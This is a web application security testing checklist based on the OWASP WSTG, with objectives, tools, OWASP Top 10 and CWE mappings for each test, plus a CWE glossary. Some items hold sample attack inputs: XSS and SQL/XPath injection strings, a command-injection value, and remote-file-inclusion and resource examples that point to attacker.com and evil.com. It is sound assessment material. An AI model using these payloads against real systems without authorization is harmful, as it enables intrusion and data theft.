1.

Information Gathering

ID WSTG-ID Test Name

Conduct Search Engine Discovery
Reconnaissance for Information Leakage
1.1 WSTG-INFO-01

Fingerprint Web Server

1.2 WSTG-INFO-02

Review Webserver Metafiles for

Information Leakage
1.3 WSTG-INFO-03

Enumerate Applications on Webserver

1.4 WSTG-INFO-04

Review Webpage Content for Information

Leakage
1.5 WSTG-INFO-05

Identify Application Entry Points

1.6 WSTG-INFO-06

Map Execution Paths Through Application

1.7 WSTG-INFO-07

Fingerprint Web Application Framework

1.8 WSTG-INFO-08

1.9 WSTG-INFO-09 Fingerprint Web Application

Map Application Architecture

1.10 WSTG-INFO-10

Symbol
Pass
Issue
N/A
 Objectives
- Identify what sensitive design and configuration information of the application, system, or
organization is exposed directly (on the organization's website) or indirectly (via third-party services).

- Determine the version and type of a running web server to enable further discovery of any known
vulnerabilities.
- Identify hidden or obfuscated paths and functionality through the analysis of metadata files
(robots.txt, <META> tag, sitemap.xml)
- Extract and map other information that could lead to a better understanding of the systems at hand.

- Enumerate the applications within the scope that exist on a web server.
- Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone
transfers

- Review webpage comments, metadata, and redirect bodies to find any information leakage.
- Gather JavaScript files and review the JS code to better understand the application and to find any
information leakage.
- Identify if source map files or other front-end debug files exist.

- Identify possible entry and injection points through request and response analysis which covers
hidden fields, parameters, methods HTTP header analysis

- Map the target application and understand the principal workflows.

- Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough
- Fingerprint the components being used by the web applications.
- Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific
files and folders, Error message.

N/A, This content has been merged into: WSTG-INFO-08

- Understand the architecture of the application and the technologies in use.
- Identify application architecture whether on Application and Network components:
Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs
Network and Security: Reverse proxy, IPS, WAF
 Tools OWASP Top 10 CWE Result Affected Item Status
Google
Hacking
Shodan NA NA Not started
Recon-ng
Wappalyzer A5 CWE-756
Nikto A6 CWE-1352 Not started

Browser
Curl
Burpsuite/ZAP A1 CWE-200 Not started

dnsrecon
Nmap
NA NA Not started

Browser
Curl
Burpsuite/ZAP CWE-200
A1 Not started
CWE-540

OWASP ASD
Burpsuite/ZAP NA NA Not started

Burpsuite/ZAP
NA NA Not started

Whatweb
Wappalyzer A5 CWE-756
CMSMap Not started
A6 CWE-1104

NA NA NA Not started
WAFW00F
Nmap
NA NA Not started
2. Configuration and Deploy Management Testing

ID WSTG-ID Test Name

Test Network Infrastructure Configuration

2.1 WSTG-CONF-01

Test Application Platform Configuration

2.2 WSTG-CONF-02

Test File Extensions Handling for Sensitive

Information
2.3 WSTG-CONF-03

Review Old Backup and Unreferenced Files for

Sensitive Information
2.4 WSTG-CONF-04

Enumerate Infrastructure and Application

Admin Interfaces
2.5 WSTG-CONF-05

Test HTTP Methods

2.6 WSTG-CONF-06

Test HTTP Strict Transport Security

2.7 WSTG-CONF-07

Test RIA Cross Domain Policy

2.8 WSTG-CONF-08

Test File Permission

2.9 WSTG-CONF-09

Test for Subdomain Takeover

2.10 WSTG-CONF-10
 Test Cloud Storage
2.11 WSTG-CONF-11
Testing for Content Security Policy
2.12 WSTG-CONF-12

2.13 WSTG-CONF-13 Test Path Confusion

Symbol
Pass
Issue
N/A
ng

Description
- Review the applications' configurations set across the network and validate that they are not
vulnerable.
- Validate that used frameworks and systems are secure and not susceptible to known
vulnerabilities due to unmaintained software or default settings and credentials.

- Ensure that defaults and known files have been removed.

- Review configuration and server handling (40*, 50*)
- Validate that no debugging code or extensions are left in the production environments.
- Review the logging mechanisms set in place for the application including Log Location, Log
Storage , Log Rotation, Log Access Control, Log Review

- Dirbust sensitive file extensions, or extensions that might contain raw data (*e.g.* scripts, raw
data, credentials, etc.).
- Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)
- Validate that no system framework bypasses exist on the rules set.

- Find and analyse unreferenced files that might contain sensitive information.
- Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of
filename

- Identify hidden administrator interfaces and functionality.

- Directory and file enumeration, comments and links in source (/admin, /administrator,
/backoffice, /backend, etc), alternative server port (Tomcat/8080)

- Enumerate supported HTTP methods using OPTIONS

- Test for access control bypass (GET->HEAD->FOO)
- Test HTTP method overriding techniques.

- Review the HSTS header and its validity.

- Identify HSTS header on Web server through HTTP response header:
curl -s -D- https://domain.com/ | grep Strict

Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml)

and allow-access-from.
- Review and Identify any rogue file permissions.
- Identify configuration file whose permissions are set to world-readable from the installation by
default.

- Enumerate all possible domains (previous and current).

- Identify forgotten or misconfigured domains.
- Assess that the access control configuration for the storage services is properly in place.

- Review the Content-Security-Policy header or meta element to identify misconfigurations.

- Make sure application paths are configured correctly.

 Tools OWASP Top 10 CWE Result Affected Item Status
Nessus
Nmap A1 CWE-284
A5 CWE-1349 Not started
A6 CWE-1352

Browser
Nikto
CIS CWE-13
Benchmarks CWE-117
CWE-223
CWE-200
A1
CWE-201
A5 Not started
CWE-489
A9
CWE-532
CWE-548
CWE-651
CWE-778

Browser
Nikto CWE-200
DirSearch A1 CWE-425 Not started
ffuf CWE-552

Browser
Nikto CWE-200
DirSearch A1 CWE-531 Not started
ffuf CWE-538

Burpsuite/ZAP
DirSearch A1 CWE-284
ffuf Not started
A4 CWE-419

netcat
curl CWE-650
A5 Not started
CWE-749

Burpsuite/ZAP
curl
A5 CWE-523 Not started

Burpsuite/ZAP
curl A5 CWE-942 Not started

Burpsuite/ZAP
Nikto A1 CWE-552
Not started
A5 CWE-732

Dnsrecon
NA CWE-673 Not started
AWS CLI
S3Scanner A1 CWE-264 Not started

Burpsuite CSP
Auditor A5 CWE-1021 Not started

Burpsuite/ZAP A5 CWE-436 Not started

3. Identity Management Testing

ID WSTG-ID Test Name

Test Role Definitions
3.1 WSTG-IDNT-01

Test User Registration Process

3.2 WSTG-IDNT-02

Test Account Provisioning Process

3.3 WSTG-IDNT-03

Testing for Account Enumeration and

3.4 WSTG-IDNT-04 Guessable User Account

Testing for Weak or Unenforced Username

Policy

3.5 WSTG-IDNT-05

Symbol
Pass
Issue
N/A
 Description Tools
- Identify and document roles used by the application. Burpsuite/
- Attempt to switch, change, or access another role. ZAP
- Review the granularity of the roles and the needs behind the permissions given.

- Verify that the identity requirements for user registration are aligned with Burpsuite/
business and security requirements. ZAP
- Validate the registration process.

- Verify which accounts may provision other accounts and of what type. Burpsuite/
ZAP
- Review processes that pertain to user identification (*e.g.* registration, login, Burpsuite/
etc.). ZAP
- Enumerate users where possible through response analysis.
- Determine whether a consistent account name structure renders the application Burpsuite/
vulnerable to account enumeration. ZAP
- User account names are often highly structured (e.g. Joe Bloggs account name is
jbloggs and Fred Nurks account name is fnurks) and valid account names can easily
be guessed.
- Determine whether the application's error messages permit account
enumeration.
OWASP Top 10 CWE Result Affected Item Status

CWE-266
A4 Not started
CWE-269

A4 CWE-419 Not started

CWE-269
A4 Not started
CWE-280

A7 CWE-204 Not started

A7 CWE-204 Not started

4. Authentication Testing

ID WSTG-ID Test Name

Testing for Credentials Transported over an
4.1 WSTG-ATHN-01 Encrypted Channel

Testing for Default Credentials

4.2 WSTG-ATHN-02

Testing for Weak Lock Out Mechanism

4.3 WSTG-ATHN-03

Testing for Bypassing Authentication Schema

4.4 WSTG-ATHN-04

Testing for Vulnerable Remember Password

4.5 WSTG-ATHN-05

Testing for Browser Cache Weaknesses

4.6 WSTG-ATHN-06

Testing for Weak Password Policy

4.7 WSTG-ATHN-07

Testing for Weak Security Question Answer

4.8 WSTG-ATHN-08

Testing for Weak Password Change or Reset

Functionalities

4.9 WSTG-ATHN-09
 Testing for Weaker Authentication in
4.10 WSTG-ATHN-10 Alternative Channel
Testing Multi-Factor Authentication (MFA)
4.11 WSTG-ATHN-11

Symbol
Pass
Issue
N/A
 Description Tools
N/A, This content has been merged into: WSTG-CRYP-03
NA

- Determine whether the application has any User accounts with default passwords. Browser
Burpsuite/
ZAP
Hydra
- Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. Browser
- Evaluate the unlock mechanism's resistance to unauthorized account unlocking. Burpsuite/
ZAP
Hydra
- Ensure that authentication is applied across all services that require it. Burpsuite/
- Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, ZAP
Session ID prediction, SQL Injection

- Validate that the generated session is managed securely and do not put the user's credentials Burpsuite/
in danger (e.g., cookie) ZAP
- Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?

- Review if the application stores sensitive information on the client-side. Browser

- Review if access can occur without authorization. Burpsuite/
- Check browser history issue by clicking "Back" button after logging out. ZAP
- Check browser cache issue from HTTP response headers (Cache-Control: no-cache)

- Determine the resistance of the application against brute Force password guessing using Burpsuite/
available password dictionaries by evaluating the length, complexity, reuse, and aging ZAP
requirements of passwords. Hydra
- Review whether new User accounts are created with weak or predictable passwords.

- Determine the complexity and how straight-forward the questions are (Weak pre-generated Browser
questions, Weak self-generated question) Burpsuite/
- Assess possible user answers and brute force capabilities. ZAP

- Determine whether the password change and reset functionality allows accounts to be Browser
compromised. Burpsuite/
- Test password reset (Display old password in plain-text?, Send via email?, Random token on ZAP
confirmation email ?)
- Test password change (Need old password?)
- Identify alternative authentication channels. Browser
- Assess the security measures used and if any bypasses exists on the alternative channels. Burpsuite/
ZAP
- Identify the type of MFA used by the application. Browser
- Determine whether the MFA implementation is robust and secure. Burpsuite/
- Attempt to bypass the MFA. ZAP
OWASP Top 10 CWE Result Affected Item Status

NA NA Not started

A7 CWE-1392 Not started

A7 CWE-307 Not started

CWE-287
CWE-288
CWE-290
CWE-294
A1
CWE-302 Not started
A7
CWE-304
CWE-306
CWE-425
CWE-804

CWE-315
A4
A5 CWE-522 Not started
CWE-524

A4 CWE-525 Not started

CWE-521
A7 Not started
CWE-1391

A7 CWE-640 Not started

A7 CWE-620 Not started

CWE-640
A7 CWE-288 Not started

CWE-288
A7 CWE-304 Not started
CWE-308
5. Authorization Testing

ID WSTG-ID Test Name

Testing Directory Traversal File Include

5.1 WSTG-ATHZ-01

Testing for Bypassing Authorization Schema

5.2 WSTG-ATHZ-02

Testing for Privilege Escalation

5.3 WSTG-ATHZ-03

Testing for Insecure Direct Object References

5.4 WSTG-ATHZ-04

Testing for OAuth Weaknesses

5.5 WSTG-ATHZ-05

Symbol
Pass
Issue
N/A
 Description Tools OWASP Top 10
- Identify injection points that pertain to path traversal. Burpsuite/
- Assess bypassing techniques and identify the extent of path traversal (dot-dot- ZAP
slash attack, Local/Remote file inclusion) A1

- Assess if horizontal or vertical access is possible. Burpsuite/

- Access to Administrative functions by force browsing (/admin/addUser) ZAP
A1

- Identify injection points related to role/privilege manipulation. For example: Burpsuite/

Change some param groupid=2 to groupid=1 ZAP
- Verify that it is not possible for a user to modify their privileges or roles inside
the application A1
- Fuzz or otherwise attempt to bypass security measures.

- Identify points where object references may occur. Burpsuite/

- Assess the access control measures and if they're vulnerable to IDOR. For ZAP
example: Force changing parameter value (?invoice=123 -> ?invoice=456) A1

- Determine if OAuth2 implementation is vulnerable or using a deprecated or Burpsuite/

custom implementation. ZAP
A1
 CWE Result Affected Item Status

CWE-22
CWE-23
Not started
CWE-35
CWE-829

CWE-285
CWE-732
Not started
CWE-862
CWE-863

CWE-269
CWE-639 Not started

CWE-639 Not started

CWE-290
CWE-345 Not started
CWE-798
6. Session Management Testing

ID WSTG-ID Test Name

Testing for Session Management Schema

6.1 WSTG-SESS-01

Testing for Cookies Attributes

6.2 WSTG-SESS-02

Testing for Session Fixation

6.3 WSTG-SESS-03

Testing for Exposed Session Variables

6.4 WSTG-SESS-04

Testing for Cross Site Request Forgery

6.5 WSTG-SESS-05

Testing for Logout Functionality

6.6 WSTG-SESS-06

Testing Session Timeout

6.7 WSTG-SESS-07

Testing for Session Puzzling

6.8 WSTG-SESS-08

Testing for Session Hijacking

6.9 WSTG-SESS-09

Testing JSON Web Tokens

6.10 WSTG-SESS-10

Symbol
Pass
Issue
N/A
 Description Tools
- Gather session tokens, for the same user and for different users where possible. Burpsuite/
- Analyze and ensure that enough randomness exists to stop session forging attacks. ZAP
- Modify cookies that are not signed and contain information that can be manipulated.

- Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure Burpsuite/
flag, Samesite=Strict) ZAP

- Analyze the authentication mechanism and its flow. Burpsuite/

- Force cookies and assess the impact. ZAP
- Check whether the application renew the cookie after a successfully user
authentication.
- Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens Burpsuite/
vulnerabilities). ZAP
- Review the caching configuration.
- Assess the channel and methods' security (Send sessionID with GET method ?)

- Determine whether it is possible to initiate requests on a user's behalf that are not Burpsuite/
initiated by the user. ZAP
- Conduct URL analysis, Direct access to functions without any token.

- Assess the logout UI. Burpsuite/

- Analyze the session timeout and if the session is properly killed after logout. ZAP
- Validate that a hard session timeout exists, after the timeout has passed, all session Burpsuite/
tokens should be destroyed or be unusable. ZAP
- Identify all session variables. Burpsuite/
- Break the logical flow of session generation. ZAP
- Check whether the application uses the same session variable for more than one
purpose
- Identify vulnerable session cookies. Burpsuite/
- Hijack vulnerable cookies and assess the risk level. ZAP
- Determine whether the JWTs expose sensitive information. Burpsuite/
- Determine whether the JWTs can be tampered with or modified. ZAP
OWASP Top 10 CWE Result Affected Item Status

CWE-315
A2 CWE-330
Not started
A4 CWE-539
CWE-694

CWE-16
CWE-614
A5 Not started
CWE-1004
CWE-1275

A7 CWE-384 Not started

A7 CWE-598 Not started

A1 CWE-352 Not started

A7 CWE-613 Not started

A7 CWE-613 Not started

A7 CWE-841 Not started

A2 CWE-523 Not started

CWE-345
A7 CWE-757 Not started
CWE-798
7. Data Validation Testing

ID WSTG-ID Test Name

Testing for Reflected Cross Site Scripting
7.1 WSTG-INPV-01

Testing for Stored Cross Site Scripting

7.2 WSTG-INPV-02

7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering

Testing for HTTP Parameter Pollution
7.4 WSTG-INPV-04

Testing for SQL Injection

7.5 WSTG-INPV-05

Testing for LDAP Injection

7.6 WSTG-INPV-06

Testing for XML Injection

7.7 WSTG-INPV-07

Testing for SSI Injection

7.8 WSTG-INPV-08

Testing for XPath Injection

7.9 WSTG-INPV-09

Testing for IMAP SMTP Injection

7.10 WSTG-INPV-10

Testing for Code Injection

7.11 WSTG-INPV-11

Testing for Command Injection

7.12 WSTG-INPV-12
 Testing for Format String Injection
7.13 WSTG-INPV-13

Testing for Incubated Vulnerability

7.14 WSTG-INPV-14

Testing for HTTP Splitting Smuggling

7.15 WSTG-INPV-15

Testing for HTTP Incoming Requests

7.16 WSTG-INPV-16

Testing for Host Header Injection

7.17 WSTG-INPV-17

Testing for Server-side Template Injection

7.18 WSTG-INPV-18

Testing for Server-Side Request Forgery

7.19 WSTG-INPV-19

Testing for Mass Assignment

7.20 WSTG-INPV-20

Symbol
Pass
Issue
N/A
 Description Tools
- Identify variables that are reflected in responses. Burpsuite/ZAP
- Assess the input they accept and the encoding that gets applied on return (if any).
- Identify stored input that is reflected on the client-side. Burpsuite/ZAP
- Assess the input they accept and the encoding that gets applied on return (if any).
N/A, This content has been merged into: WSTG-CONF-06 NA
- Identify the backend and the parsing method used. Burpsuite/ZAP
- Assess injection points and try bypassing input filters using HPP.
- Identify SQL injection points. Burpsuite/ZAP
- Assess the severity of the injection and the level of access that can be achieved through it. SQLMap
NoSQLMap

- Identify LDAP injection points: Burpsuite/ZAP

/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password
- Assess the severity of the injection:

- Identify XML injection points with XML Meta Characters: Burpsuite/ZAP

', " , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG Wfuzz
- Assess the types of exploits that can be attained and their severities.

- Identify SSI injection points (Presense of .shtml extension) with these characters: Burpsuite/ZAP
< ! # = / . " - > and [a-zA-Z0-9]
- Assess the severity of the injection.

- Identify XPATH injection points by checking for XML error enumeration by supplying a Burpsuite/ZAP
single quote ('):
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1

- Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \, Burpsuite/ZAP
‘, “, @, #, !, |)
- Understand the data flow and deployment structure of the system.
- Assess the injection impacts.

- Identify injection points where you can inject code into the application. Burpsuite/ZAP
- Check LFI with dot-dot-slash (../../), PHP Wrapper Liffy
(php://filter/convert.base64-encode/resource). LFImap
- Check RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page
- Assess the injection severity.

- Identify and assess the command injection points with special characters (i.e.: | ; & $ > < Burpsuite/ZAP
' !) Commix
For example: ?doc=Doc1.pdf+|+Dir c:\
- Assess whether injecting format string conversion specifiers into user-controlled fields Immunity
causes undesired behavior from the application. Canvas
Spike
MSF
- Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Burpsuite/ZAP
Injection, Blind Stored XSS, File Upload) BeEF
- Understand how a recall step could occur.
- Set listeners or activate the recall step if possible.

- Assess if the application is vulnerable to splitting, identifying what possible attacks are Burpsuite/ZAP
achievable.
- Assess if the chain of communication is vulnerable to smuggling, identifying what possible
attacks are achievable.

- Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any Burpsuite/ZAP
suspicious requests.
- Monitor HTTP traffic without changes of end user Browser proxy or client-side application.

- Assess if the Host header is being parsed dynamically in the application. Burpsuite/ZAP
- Bypass security controls that rely on the header. Netcat
- Detect template injection vulnerability points. Burpsuite/ZAP
- Identify the templating engine. Tplmap
- Build the exploit.

- Identify SSRF injection points. Burpsuite/ZAP

- Test if the injection points are exploitable.
- Asses the severity of the vulnerability.

- Identify requests that modify objects Burpsuite/ZAP

- Assess if it is possible to modify fields never intended to be modified from outside
OWASP Top 10 CWE Result Affected Item Status

A3 CWE-79 Not started

A3 CWE-79 Not started

NA NA Not started

A3 CWE-235 Not started

A3 CWE-89 Not started

A3 CWE-90 Not started

CWE-91
A5 CWE-611 Not started
CWE-652

A3 CWE-97 Not started

CWE-91
A3 Not started
CWE-643

A3 CWE-147 Not started

CWE-22
CWE-94
A3 CWE-95 Not started
CWE-98
CWE-829

CWE-77
A3 Not started
CWE-78
A3 CWE-134 Not started

CWE-79
A3 CWE-434 Not started
CWE-1236

CWE-93
A3
A4 CWE-113 Not started
CWE-444

NA NA Not started

CWE-74
A4 Not started
CWE-116

A4 CWE-1336 Not started

A10 CWE-918 Not started

A4 CWE-915 Not started

8. Error Handling

ID WSTG-ID Test Name

Testing for Improper Error Handling

8.1 WSTG-ERRH-01

8.2 WSTG-ERRH-02 Testing for Stack Traces

Symbol
Pass
Issue
N/A
 Description
- Identify existing error output (i.e.: Random files/folders (40x)
- Analyze the different output returned.

N/A, This content has been merged into: WSTG-ERRH-01

Description Tools OWASP Top 10
Burpsuite/
ZAP

A5

NA NA
 CWE Result Affected Item Status

CWE-209
CWE-210
CWE-431
CWE-497 Not started
CWE-544
CWE-550
CWE-728

NA Not started
9. Cryptography

ID WSTG-ID Test Name

Testing for Weak Transport Layer Security

9.1 WSTG-CRYP-01

Testing for Padding Oracle

9.2 WSTG-CRYP-02

Testing for Sensitive Information Sent via

Unencrypted Channels

9.3 WSTG-CRYP-03
 Testing for Weak Encryption

9.4 WSTG-CRYP-04

Symbol
Pass
Issue
N/A
 Description Tools OWASP Top 10
- Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, testssl.sh
BEAST, CRIME, POODLE)
- Review the digital certificate's cryptographic strength and validity.
- Ensure that the TLS security is not bypassable and is properly implemented
across the application.
A2
A7

- Identify encrypted messages that rely on padding. PadBuster

- Attempt to break the padding of the encrypted messages and analyze the POET
returned error messages for further analysis. A2

- Identify sensitive information transmitted through the various channels. Burpsuite/

- Assess the privacy and security of the channels used. ZAP
- Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…) A2
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)
- Provide a guideline for the identification weak encryption or hashing uses and Testssl.sh
implementations. Nessus

A2
 CWE Result Affected Item Status

CWE-295
CWE-296
CWE-297
CWE-298
CWE-319 Not started
CWE-326
CWE-327
CWE-310
CWE-757

CWE-326
Not started
CWE-649

CWE-311
CWE-319 Not started
CWE-523
CWE-261
CWE-320
CWE-321
CWE-322
CWE-323
CWE-324
CWE-325
CWE-326
CWE-327
CWE-328
CWE-329
CWE-330
CWE-331 Not started
CWE-335
CWE-336
CWE-337
CWE-338
CWE-340
CWE-347
CWE-354
CWE-759
CWE-760
CWE-780
CWE-798
CWE-916
10. Business logic Testing

ID WSTG-ID Test Name

Test Business Logic Data Validation

10.1 WSTG-BUSL-01

Test Ability to Forge Requests

10.2 WSTG-BUSL-02

Test Integrity Checks

10.3 WSTG-BUSL-03

Test for Process Timing

10.4 WSTG-BUSL-04

Test Number of Times a Function Can Be Used

Limits

10.5 WSTG-BUSL-05

Testing for the Circumvention of Work Flows

10.6 WSTG-BUSL-06

Test Defenses Against Application Misuse

10.7 WSTG-BUSL-07
 Test Upload of Unexpected File Types

10.8 WSTG-BUSL-08

Test Upload of Malicious Files

10.9 WSTG-BUSL-09

Test Payment Functionality

10.10 WSTG-BUSL-10

Symbol
Pass
Issue
N/A
 Description Tools
- Identify data injection points. Burpsuite/
- Validate that all checks are occurring on the back end and can't be bypassed. ZAP
- Attempt to break the format of the expected data and analyze how the application
is handling it.

- Review the project documentation looking for guessable, predictable, or hidden Burpsuite/
functionality of fields. ZAP
- Insert logically valid data in order to bypass normal business logic workflow.

- Review the project documentation for components of the system that move, store, Burp Proxy
or handle data.
- Determine what type of data is logically acceptable by the component and what
types the system should guard against.
- Determine who should be allowed to modify or read that data in each component.
- Attempt to insert, update, or delete data values used by each component that
should not be allowed per the business logic workflow.

- Review the project documentation for system functionality that may be impacted Burpsuite/
by time. Such as execution time or actions that ZAP
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
- Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing (Race Condition).

- Identify functions that must set limits to the times they can be called. Burpsuite/
- Assess if there is a logical limit set on the functions and if it is properly validated. ZAP
- For each of the functions and features found that should only be executed a single
time or specified number of times during the business logic workflow, develop
abuse/misuse cases that may allow a user to execute more than the allowable
number of times.

- Review the project documentation for methods to skip or go through steps in the Burpsuite/
application process in a different order from the intended business logic flow. ZAP
- Develop a misuse case and try to circumvent every logic flow identified.

- Generate notes from all tests conducted against the system. Burpsuite/
- Review which tests had a different functionality based on aggressive input. ZAP
- Understand the defenses in place and verify if they are enough to protect the
system against bypassing techniques.
- Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account
- Review the project documentation for file types that are rejected by the system. Burpsuite/
- Verify that the unwelcomed file types are rejected and handled safely. Also, check ZAP
whether the website only check for "Content-type" or file extension.
- Verify that file batch uploads are secure and do not allow any bypass against the
set security measures.

- Identify the file upload functionality. Burpsuite/

- Review the project documentation to identify what file types are considered ZAP
acceptable, and what types would be considered dangerous or malicious.
- If documentation is not available then consider what would be appropriate based
on the purpose of the application.
- Determine how the uploaded files are processed.
- Obtain or create a set of malicious files for testing.
- Try to upload the malicious files to the application and determine whether it is
accepted and processed.

- Determine whether the business logic for the e-commerce functionality is robust. Burpsuite/
- Understand how the payment functionality works. ZAP
- Determine whether the payment functionality is secure.
OWASP Top 10 CWE Result Affected Item Status

A4 CWE-840 Not started

A4 CWE-840 Not started

CWE-840
A4 Not started
CWE-472

A4 CWE-840 Not started

CWE-362

A4 CWE-799 Not started

A7

A4 CWE-841 Not started

A4 CWE-693 Not started

 CWE-434
A4 Not started
CWE-602

A4 CWE-434 Not started

CWE-472
A4 CWE-602 Not started
CWE-807
11. Client Side Testing

ID WSTG-ID Test Name

Testing for DOM-Based Cross Site Scripting
11.1 WSTG-CLNT-01

Testing for JavaScript Execution

11.2 WSTG-CLNT-02

Testing for HTML Injection

11.3 WSTG-CLNT-03

Testing for Client-side URL Redirect

11.4 WSTG-CLNT-04

Testing for CSS Injection

11.5 WSTG-CLNT-05

Testing for Client-side Resource Manipulation

11.6 WSTG-CLNT-06

Testing Cross Origin Resource Sharing

11.7 WSTG-CLNT-07

Testing for Cross Site Flashing

11.8 WSTG-CLNT-08

Testing for Clickjacking

11.9 WSTG-CLNT-09

Testing WebSockets
11.10 WSTG-CLNT-10

Testing Web Messaging

11.11 WSTG-CLNT-11
Testing Browser Storage

11.12 WSTG-CLNT-12

Testing for Cross Site Script Inclusion

11.13 WSTG-CLNT-13
11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing

Symbol
Pass
Issue
N/A
 Description Tools OWASP Top 10
- Identify DOM sinks. Burpsuite/
- Build payloads that pertain to every sink type. ZAP
For example: #<script>alert('xss')</script> A3

- Identify sinks and possible JavaScript injection points. Burpsuite/

For example: ?javascript:alert(1) ZAP A3

- Identify HTML injection points and assess the severity of the injected Burpsuite/
content. ZAP
For example: page.html?user=<img%20src='aaa'%20onerror=alert(1)> A3

- Identify injection points that handle URLs or paths. Burpsuite/

- Assess the locations that the system could redirect to (Open Redirect). ZAP
For example: ?redirect=www.fake-target.site A4

- Identify CSS injection points. Burpsuite/

- Assess the impact of the injection. ZAP A3

- Identify sinks with weak input validation. Burpsuite/

- Assess the impact of the resource manipulation. ZAP
For example: www.victim.com/#http://evil.com/js.js A3

- Identify endpoints that implement CORS. Burpsuite/

- Ensure that the CORS configuration is secure or harmless. ZAP A5

- Decompile and analyze the application's code. Flare

- Assess sinks inputs and unsafe method usages. Flasm
For example: file.swf?lang=http://evil SWF Intruder A3

- Understand security measures in place. Burpsuite/

- Discover if a website is vulnerable by loading into an iframe, create ZAP
simple web page that includes a frame containing the target. A5
- Assess how strict the security measures are and if they are bypassable.

- Identify the usage of WebSockets by inspecting ws:// or wss:// URI Burpsuite/

scheme. ZAP A2
- Assess its implementation by using the same tests on normal HTTP A3
channels.
- Assess the security of the message's origin. Burpsuite/
- Validate that it's using safe methods and validating its input. ZAP A5

- Determine whether the website is storing sensitive data in client-side Burpsuite/

storage. ZAP
- The code handling of the storage objects should be examined for
possibilities of injection attacks, such as utilizing unvalidated input or A1
vulnerable libraries. A4

- Locate sensitive data across the system. Burpsuite/

- Assess the leakage of sensitive data through various techniques. ZAP A3
N/A Burpsuite/ A3
ZAP
 CWE Result Affected Item Status

CWE-79 Not started

CWE-79 Not started

CWE-80 Not started

CWE-601 Not started

CWE-20 Not started

CWE-20 Not started

CWE-942 Not started

CWE-79 Not started

CWE-1021 Not started

CWE-319
Not started
CWE-1347

CWE-1020 Not started

CWE-312
CWE-313
Not started
CWE-315
CWE-922

CWE-79 Not started

CWE-1022 Not started
12. API Testing

ID WSTG-ID Test Name

Testing GraphQL
12.1 WSTG-APIT-01

Symbol Definition
Pass Requirement is applicable to mobile App and implemented
according to best practices.
Issue Requirement is applicable to mobile App but not fulfilled.
N/A Requirement is not applicable to mobile App.
 Description Tools
- Assess that a secure and production-ready configuration is deployed. Burpsuite/ZAP
- Validate all input fields against generic attacks. GraphSQL Raider
- Ensure that proper access controls are applied.
OWASP Top 10 CWE Result Affected Item Status

A3 CWE-1347 Not started

Web Security Testing Guide (WSTG)
WSTG - Information Gathering

WSTG - Configuration and Deploy Management Testi

WSTG - Identity Management Testing

WSTG - Authentication Testing

WSTG - Authorization Testing

WSTG - Session Management Testing

WSTG - Data Validation Testing

WSTG - Error Handling

WSTG - Cryptography
WSTG - Business logic Testing

WSTG - Client Side Testing

WSTG - API Testing
CWE
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CWE-540 Inclusion of Sensitive Information in Source Code
CWE-756 Missing Custom Error Page
CWE-1104 Use of Unmaintained Third Party Components
CWE-1352 Vulnerable and Outdated Components
CWE-13 ASP.NET Misconfiguration: Password in Configuration File
CWE-117 Improper Output Neutralization for Logs
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CWE-201 Exposure of Sensitive Information Through Sent Data
CWE-223 Omission of Security-relevant Information
CWE-264 Permissions, Privileges, and Access Controls (should no longer be used)
CWE-284 Improper Access Control
CWE-419 Unprotected Primary Channel
CWE-425 Direct Request ('Forced Browsing')
CWE-436 Interpretation Conflict
CWE-489 Active Debug Code
CWE-523 Unprotected Transport of Credentials
CWE-531 Inclusion of Sensitive Information in Test Code
CWE-532 Insertion of Sensitive Information into Log File
CWE-538 Insertion of Sensitive Information into Externally-Accessible File or Directory
CWE-548 Exposure of Information Through Directory Listing
CWE-552 Files or Directories Accessible to External Parties
CWE-650 Trusting HTTP Permission Methods on the Server Side
CWE-651 Exposure of WSDL File Containing Sensitive Information
CWE-673 External Influence of Sphere Definition
CWE-732 Incorrect Permission Assignment for Critical Resource
CWE-749 Exposed Dangerous Method or Function
CWE-778 Insufficient Logging
CWE-942 Permissive Cross-domain Policy with Untrusted Domains
CWE-1021 Improper Restriction of Rendered UI Layers or Frames
CWE1349 Security Misconfiguration
CWE-1352 Vulnerable and Outdated Components
CWE-204 Observable Response Discrepancy
CWE-266 Incorrect Privilege Assignment
CWE-269 Improper Privilege Management
CWE-280 Improper Handling of Insufficient Permissions or Privileges
CWE-419 Unprotected Primary Channel
CWE-287 Improper Authentication
CWE-288 Authentication Bypass Using an Alternate Path or Channel
CWE-290 Authentication Bypass by Spoofing
CWE-294 Authentication Bypass by Capture-replay
CWE-302 Authentication Bypass by Assumed-Immutable Data
CWE-304 Missing Critical Step in Authentication
CWE-306 Missing Authentication for Critical Function
CWE-307 Improper Restriction of Excessive Authentication Attempts
CWE-308 Use of Single-factor Authentication
CWE-315 Cleartext Storage of Sensitive Information in a Cookie
CWE-425 Direct Request ('Forced Browsing')
CWE-521 Weak Password Requirements
